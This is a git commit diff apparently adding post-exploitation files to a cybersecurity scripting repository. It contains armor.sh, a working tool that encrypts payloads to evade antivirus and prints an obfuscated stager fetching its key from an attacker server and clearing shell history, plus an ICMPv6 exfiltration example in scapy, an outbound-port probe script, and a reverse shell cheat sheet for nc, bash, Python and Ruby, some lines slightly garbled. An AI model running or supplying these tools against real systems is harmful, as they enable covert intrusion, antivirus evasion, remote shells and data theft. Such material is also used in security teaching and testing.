adding scripting resources

2025-07-31 02:09:13 -04:00 · 2021-07-17 11:36:49 -04:00 · 2021-07-17 11:36:49 -04:00 · 02eeedc958
commit 02eeedc958
parent 8ce1d65785
22 changed files with 44 additions and 0 deletions
--- a/programming_and_scripting_for_cybersecurity/post_exploitation/armor.sh
+++ b/programming_and_scripting_for_cybersecurity/post_exploitation/armor.sh
@ -0,0 +1,258 @@
+#!/bin/bash
+# based on the work by @tokyoneon_
+# Armor relies on LibreSSL to encrypt the input file and create the SSL certificate.
+# If LibreSSL isn't found in your system, Armor will attempt to install it. 
+
+# Variables for colorful terminal output.
+R="\033[1;31m"
+Y="\033[1;33m"
+G="\033[1;32m"
+N="\033[0;39m"
+
+clear
+# The script name, taken from the input file; first arg.
+sN="$(echo "$1" | sed 's/.*\///')"
+
+# Random 4-digit string appended to the filename to prevent clobbering 
+# previous iterations of the same input file and to avoid enumation attempts
+# by anyone crawling the attackers server to locate the master key. To increase
+# the length of the random string, change "2" to "5" or "10".
+fnRand="$(openssl rand -hex 2)"
+
+# The script name and random string are combined to create the filename
+# for most of the generated files.
+inFile="$sN"_"$fnRand"
+
+# When generating self-signed SSL certificates, a Common Name (domain name)
+# is required. This value could've been static, but I decided to have
+# each certificate contain a unique Common Name. Actually, when the master
+# key is fetched from the attacker's server, the Common Name is ignored.
+# This is just a formality.
+cnRand="$(openssl rand -hex 4)"
+
+# A random string is inserted into the encoded stager to make the base64
+# string appear different every time. This is done to obfuscate the string
+# and (hopefully) make it less identifiable to antivirus software. 
+junk="$(openssl rand -hex 12)"
+
+# The attacker's IP address is converted into a hexidecimal string. There's
+# no real reason for this, it's easily reverse engineered back an IPv4 
+# address. Still, in the spirit of overkill obfuscation, this felt appropriate.
+aH="0x$(printf '%02X' $(echo ${2//./ }))"
+
+# The attacker's desired port number. This port number is used by the 
+# target device to fetch the master key and decrypt the payload. Be careful
+# not to use your Metasploit or Netcat listening port here. 
+aP="$3"
+
+# A variable created to identify the working directory. This variable is 
+# used in several functions.
+dir="$(pwd -P)"
+
+# The below three functions are used to print messages in the script. They 
+# use the previously defined color variables to print messages, instructions,
+# and errors.
+function msg () {
+	echo -e "$G [+] $N $1" 
+}
+
+function msg_instruct () {
+	echo -e "$Y \n [!] $1\n $N"
+}
+
+function msg_fatal () {
+	echo -e "$R \n [ERROR] $1\n $N" 
+	exit 0
+}
+
+# OS detection for below ascii_art function. Base64 "-D" for macOS, "-d" for 
+# Debian/Ubuntu. Other operating systems are untested.
+function os_detect () {
+	case "$(uname -s)" in
+	   Darwin)
+		 osDetect='-D'
+		 ;;
+	   Linux)
+		 osDetect='-d'
+		 ;;
+	   *)
+		 msg_fatal "OS detection failed. Comment out the os_detect and ascii_art functions to force continue."
+		 ;;
+	esac
+	}
+
+os_detect
+
+# The "armor" and panther ascii art are encoded; easier than escaping 
+# special characters. Comment out the ascii_art function to suppress the 
+# logo. It's gimmicky, I know.
+function ascii_art () {
+	echo -e "$R" "$(echo 'CgoKCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLi4sY284b2Mub284ODg4Y2MsLi4KCSAg
+ICBvOG8uICAgICAgICAgICAgICAgIC4uLG84ODk2ODlvb284ODhvIjg4ODg4ODg4b29vYy4uCgkg
+IC44ODg4ICAgICAgICAgICAgICAgLm84ODg4Njg4OCIuODg4ODg4ODhvJz84ODg4ODg4ODg4ODlv
+b28uLi4uCgkgIGE4OFAgICAgICAgICAgICAuLmM2ODg4NjkiIi4uLCJvODg4ODg4ODg4by4/ODg4
+ODg4ODg4OCIiLm9vbzg4ODhvby4KCSAgMDg4UCAgICAgICAgIC4uYXRjODg4OSIiLixvbzhvLjg2
+ODg4ODg4ODg4byA4ODk4ODg4OSIsbzg4ODg4ODg4ODg4OC4KCSAgODg4dCAgLi4uY29vNjg4ODg5
+Iicub29vODhvODhiLic4Njk4ODk4ODg4OSA4Njg4ODg4J284ODg4ODk2OTg5Xjg4OG8KCSAgIDg4
+ODg4ODg4ODg4OCIuLm9vbzg4ODk2ODg4ODg4ICAgIjlvNjg4ODg4JyAiODg4OTg4IDg4ODg4Njg4
+ODgnbzg4ODg4CiAgICAgICAgICAgIiJHODg4OSIiJ29vbzg4ODg4ODg4ODg4ODg5ICAgLmQ4bzk4
+ODkiIicgICAiODY4OG8uIjg4ODg4OTg4Im84ODg4ODhvIC4KCQkgICAgbzg4ODgnIiIiIiIiIiIi
+JyAgICAgbzg2ODgiICAgICAgICAgIDg4ODY4LiA4ODg4ODguNjg5ODg4ODgibzhvLiAKCQkgICAg
+ODg4ODhvLiAgICAgICAgICAgICAgIjg4ODhvb28uICAgICAgICAnODg4OC4gODg4ODguODg5ODg4
+OG8iODg4by4uCgkgICAgICAgICAgICI4ODg4bCAnICAgICAgICAgICAgICAgIjg4ODg4OCcgICAg
+ICAgICAgJyIiOG8iODg4OC44ODY5ODg4b284ODg4byAKICAgICAuOy4gICAgICAuOzs7OzssLiAg
+ICAgLCcgICAgICAgLCwgICAgIC4sOywnICAgICAgOzs7OzssLiAgOi4iODg4OCAiODg4ODg4ODg4
+Xjg4bwogICAgIE9NMCAgICAgIHhXbDo6Y29LMC4gIC5XTSwgICAgIDtNVyAgICxLT2xjY3hYZCAg
+ICdNazo6Y2xrWGMgLi44ODg4LC4gIjg4ODg4ODg4ODg4LgogICAgLldYTS4gICAgIHhXICAgICAg
+SzAgIC5XTUsgICAgIEtNVyAgIE5rICAgICA7TTogICdNOiAgICAgbE0nOm84ODgubzhvLiAgIjg2
+Nm85ODg4bwogICAgbE4uWG8gICAgIHhXICAgICAgT0sgIC5XS1djICAgbFdLVyAgLldkICAgICAu
+TWwgICdNOiAgICAgO00sOjg4OC5vODg4OC4gICI4OC4iODkiLgogICAgMGsgZFggICAgIHhXICAg
+ICAgT0sgIC5Xb2RYLiAuTm9kVyAgLldkICAgICAuTWwgICdNOiAgICAgO00sIDg5ICA4ODg4ODgg
+ICAgIjg4IjouCiAgICdNOyAnTSwgICAgeFcgICAgICBLTyAgLldvLk5vIGRYIGRXICAuV2QgICAg
+IC5NbCAgJ006ICAgICBvTS4gICAgICc4ODg4bwogICBvTiAgIEt4ICAgIHhXLmNjY29LTy4gIC5X
+byBjV2xXOiBkVyAgLldkICAgICAuTWwgICdNYztjY2xrWGMgICAgICAgIjg4ODguLgogICBYZCAg
+IG9OLiAgIHhXIHhXYycuICAgIC5XbyAgS00wICBkVyAgLldkICAgICAuTWwgICdNOixXTycuICAg
+ICAgICAgIDg4ODg4OG8uCiAgO01jLi4uOk1jICAgeFcgIDBLLiAgICAgLldvICAsVycgIGRXICAu
+V2QgICAgIC5NbCAgJ006IGNXOiAgICAgICAgICAgICI4ODg4ODksCiAgT1hsbGxsbEtLICAgeFcg
+IC5LTyAgICAgLldvICAgJyAgIGRXICAuV2QgICAgIC5NbCAgJ006ICBvTicgICAgICAgLiA6IDou
+Ojo6Oi46IDouCiAuTW8gICAgIGNNLCAgeFcgICAuWGQgICAgLldvICAgICAgIGRXICAuV2QgICAg
+IC5NbCAgJ006ICAgZFguICAgY3JlYXRlZCBieSBAdG9reW9uZW9uXwogb1cuICAgICAuV2QgIHhX
+ICAgICdXOiAgIC5XbyAgICAgICBkVyAgIFhPICAgICA6TTsgICdNOiAgICAwTyAgIAogS08gICAg
+ICAgeE4gIHhXICAgICA6TiwgIC5XbyAgICAgICBkVyAgIC5PMHhvZE8wYyAgICdNOiAgICAuWGsg
+IAogCgoKCgoKCgoKCgoKCg==' | base64 "$osDetect")"$N""
+	}
+
+ascii_art
+
+# The version of OpenSSL found in Debian/Kali isn't compatible with macOS' LibreSSL. 
+# Payloads encrypted in Kali will not be decryptable by the target MacBook.
+# As a workaround, OpenSSL in Ubuntu was tested and is compatible with LibreSSL 
+# in macOS. Alternatively, allow the armor script to attempt to install LibreSSL. 
+# https://linuxg.net/how-to-install-libressl-2-1-6-on-linux-systems/
+# https://github.com/libressl-portable/portable
+function libressl_install () {
+	if [[ ! -f /usr/bin/make ]]; then
+		msg_fatal "make: command not found. Install with: sudo apt-get install build-essential"
+	fi
+	wget 'https://ftp.openbsd.org/pub/OpenBSD/LibreSSL/libressl-2.8.2.tar.gz' &&\
+	tar -xzvf libressl-2.8.2.tar.gz libressl-2.8.2/ &&\
+	cd libressl-2.8.2/ &&\
+	./configure &&\
+	make &&\
+	sudo make install &&\
+	sudo ldconfig &&\
+	if [[ "$(/usr/local/bin/openssl version -v | awk '{print $1}')" = 'LibreSSL' ]]; then
+		msg "It appears LibreSSL was installed successfully."
+	else
+		msg_fatal "Unknown issue while installing LibreSSL."
+	fi
+	}
+
+# Verifies LibreSSL compatibility or tries to install it.
+function openssl_check () {
+	if [[ $(/usr/bin/openssl version -v | awk '{print $1}') = 'LibreSSL' ]]; then
+		opensslPath='/usr/bin/openssl'
+	elif [[ $(/usr/local/bin/openssl version -v | awk '{print $1}') = 'LibreSSL' ]]; then
+		opensslPath='/usr/local/bin/openssl'
+	else
+		msg_instruct "LibreSSL version detection failed. MacOS uses LibreSSL and will not be able to decrypt payloads made in Debian/Kali (e.g., OpenSSL 1.1.0h). Attempt to install LibreSSL? y/N"
+		read libreInstall
+		if [[ "$libreInstall" = 'y' ]]; then
+			libressl_install
+			exit 0
+		else
+			exit 0
+		fi
+	fi
+	}
+
+# The master key used to encrypt the payload is generated.
+function mk_key () {
+	"$opensslPath" rand -hex 512 > "$inFile".key &&\
+	msg "Generated encryption key: "$dir"/"$inFile".key" ||\
+	msg_fatal "Failed to create the master key."
+}
+
+# The payload is encrypted and encoded. Encrypted to evade antivirus, encoded
+# to make transporting it easier.
+function crypt_payload () {
+	"$opensslPath" enc -aes-256-cbc -a -A -in "$1" -pass file:"$inFile".key -out "$inFile".enc &&\
+	msg "Encrypted payload: "$dir"/"$inFile".enc" ||\
+	msg_fatal "Failed to encrypt the payload. Check the file path and filename."
+}
+
+# The self-signed SSL certificate for Ncat is generated. Encrypting the 
+# transmission of the master key is important. If DPI is taking place at 
+# the time of the attack, it would be possible for an incident response
+# team to reconstruct the master key using the raw TCP data.
+function mk_ssl () {
+	"$opensslPath" req -new -newkey rsa:4096 -x509 -sha256 -days 30 -nodes -subj '/CN='"$cnRand"'' \
+	-out "$inFile".crt -keyout "$inFile"_ssl.key >/dev/null 2>&1 &&\
+	msg "Generated SSL certificate: "$dir"/"$inFile".crt" ||\
+	msg_fatal "Unknown error."
+	msg "Generated SSL key: "$dir"/"$inFile"_ssl.key"
+}
+
+# The suggested stager command is printed. This can be embedded into an 
+# AppleScript or used with a USB Rubber Ducky. The `history -c` command is
+# appened to the stager to prevent it from being saved to the target's
+# Terminal history. This, believe it or not, also helps with evading antivirus
+# software. 
+function mk_stager () {
+	stager=""$junk">/dev/null 2>&1; openssl enc -d -aes-256-cbc \
+	-in <(printf '%s' '$(cat "$inFile".enc)' | base64 -D) \
+	-pass file:<(curl -s --insecure https://"$aH":"$aP")"
+	echo -e "bash -c \"\$(bash -c \"\$(printf '%s' '$(printf '%s' "$stager" | base64)' | base64 -D)\")\";history -c" > "$dir"/"$inFile"_stager.txt &&\
+	msg "Saved stager: "$dir"/"$inFile"_stager.txt"
+	msg_instruct "Execute the below stager in the target MacBook:"
+	cat "$dir"/"$inFile"_stager.txt
+}
+
+# The suggested Ncat listener command is printed. Ncat works well because 
+# the listener automatically terminates after just one established connection. 
+# If the stager is reverse engineered, it would be possible to discover 
+# the attacker's IP address and the location of the master key, but at that 
+# point, the key will no longer be accessible to the internet (or local network).
+function ncat_listener () {
+	msg_instruct "Start Ncat listener with:"
+	echo -e "$1"
+}
+
+# Attempts to start the Ncat listener for you.
+function start_ncat () {
+	ncatListener="ncat -v --ssl --ssl-cert $dir/$inFile.crt \
+--ssl-key $dir/$inFile\_ssl.key \
+-l -p $aP < $dir/$inFile.key"
+	
+	if [[ ! -f /usr/local/bin/ncat ]] && [[ ! -f /usr/bin/ncat ]]; then
+		msg_fatal "Ncat not found. Install Nmap: https://nmap.org/book/install.html"
+	fi
+	msg_instruct "Start the Ncat listener now? y/N "
+	read answer
+	if [[ "$answer" = 'y' ]]; then
+		clear
+		msg "Ncat active for stager: "$inFile"..."
+		eval "$ncatListener"
+	else
+		ncat_listener "$ncatListener"
+	fi
+	}
+
+# Some minor input validation. If the input file, attacker's IP address,
+# and port number are not included, the script exits.
+if [[ ! $3 ]]; then
+	msg_fatal "Missing args. Use the below command:"$N"\n\n$ ./armor.sh /path/to/payload 192.168.1.2 8080"
+else	
+	# Checks to make sure the input file actually exists.
+	if [[ ! -f "$1" ]]; then
+		msg_fatal "Payload not found. Check file path and filename."
+	fi
+fi
+
+# Executes all of the above functions in order.
+openssl_check
+mk_key
+crypt_payload "$1"
+mk_ssl
+mk_stager
+start_ncat
--- a/programming_and_scripting_for_cybersecurity/post_exploitation/exfil-scapy.md
+++ b/programming_and_scripting_for_cybersecurity/post_exploitation/exfil-scapy.md
@ -0,0 +1,56 @@
+# Example of Exfiltration over IPv6 Using Scapy
+
+Libraries like scapy for Python make it easier for developers to interact with networking abstractions at a higher level. 
+For example, with only two lines of code we are able to send a crafted packet to an IPv6 endpoint:
+
+```
+from scapy.all import IPv6,Raw,send
+send(IPv6(dst="XXXX:XXX:X:1663:7a8a:20ff:fe43:93d4")/Raw(load="sensitive_info"))
+```
+
+And sniffing on the other endpoint we can see the packet reaching its destination with the extra raw layer where we included the ‘test’ string:
+
+```
+# tcpdump -s0 -l -X -i eth0 'ip6 and not icmp6'
+tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
+listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
+23:47:15.996483 IP6 XXXX:XXX:X:1663::1ce > XXXX:XXX:X:1662:7a8a:20ff:fe43:93d4: no next header
+        0x0000:  6000 0000 0004 3b3e XXXX XXXX XXXX 1663  `.....;>.......c
+        0x0010:  0000 0000 0000 01ce XXXX XXXX XXXX 1662  ...............b
+        0x0020:  7a8a 20ff fe43 93d4 7465 7374 0000       z....C..sensitive_info..
+```
+
+
+Another example:
+
+```
+from scapy.all import IPv6,ICMPv6EchoRequest,send
+import sys
+
+secret   = "THISISASECRET" # hidden info stored in the packet
+endpoint = sys.argv[1] # addr where are we sending the data
+
+# taken from a random ping6 packet
+#        0x0030:  1e38 2c5f 0000 0000 4434 0100 0000 0000  .8,_....D4......
+#        0x0040:  1011 1213 1415 1617 1819 1a1b 1c1d 1e1f  ................
+#        0x0050:  2021 2223 2425 2627 2829 2a2b 2c2d 2e2f  .!"#$%&'()*+,-./
+#        0x0060:  3031 3233 3435 3637                      01234567
+data =  "\x1e\x38\x2c\x5f\x00\x00\x00\x00\x44\x34\x01\x00\x00\x00\x00\x00" \
+        "\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" \
+        "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f" \
+        "\x30\x31\x32\x33\x34\x35\x36\x37"
+
+def sendpkt(d):
+  if len(d) == 2:
+    seq = (ord(d[0])<<8) + ord(d[1])
+  else:
+    seq = ord(d)
+  send(IPv6(dst=endpoint)/ICMPv6EchoRequest(id=0x1337,seq=seq, data=data))
+
+# encrypt data with key 0x17
+xor = lambda x: ''.join([ chr(ord(c)^0x17) for c in x])
+
+i=0
+for b in range(0, len(secret), 2):
+  sendpkt(xor(secret[b:b+2]))
+```
--- a/programming_and_scripting_for_cybersecurity/post_exploitation/letmeout.sh
+++ b/programming_and_scripting_for_cybersecurity/post_exploitation/letmeout.sh
@ -0,0 +1,12 @@
+#!/bin/bash
+# A quick script to test exfil ports.
+# Using @mubix letmeoutofyour.net site (https://gitlab.com/mubix/letmeoutofyour.net)
+# Author: Omar Santos @santosomar
+
+
+for i in $(eval echo {$1..$2})
+do
+    echo "Is port $i open for potential exfil?"
+    curl http://letmeoutofyour.net:$i
+
+done
--- a/programming_and_scripting_for_cybersecurity/post_exploitation/reverse_shells.md
+++ b/programming_and_scripting_for_cybersecurity/post_exploitation/reverse_shells.md
@ -0,0 +1,21 @@
+# Reverse Shell Commands
+The following are some useful commands to start listeners and reverse shells in Linux and Windows-based systems.
+
+## Netcat Linux Reverse Shell
+`nc 10.10.10.10 888 -e /bin/sh`
+* 10.10.10.10 is the IP address of the machine you want the victim to connect to.
+* 888 is the port number (change this to whatever port you would like to use, just make sure that no firewall is blocking it).
+
+## Netcat Linux Reverse Shell
+`nc 10.10.10.10 888 -e cmd.exe`
+* 10.10.10.10 is the IP address of the machine you want the victim to connect to.
+* 888 is the port number (change this to whatever port you would like to use, just make sure that no firewall is blocking it).
+
+## Using Bash
+`bash -i & /dev/tcp/10.10.10.10/888 0 &1`
+
+## Using Python
+`python -c 'import socket, subprocess, os; s=socket. socket (socket.AF_INET, socket.SOCK_STREAM); s.connect(("10.10.10.10",888)); os.dup2(s.fileno(),0); os.dup2(s.fileno(l,1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'` 
+
+## Using Ruby
+`ruby -rsocket -e'f=TCPSocket.open("10.10.10.10",888).to_i; exec sprintf("/bin/sh -i &%d &%d 2 &%d",f,f,f)'`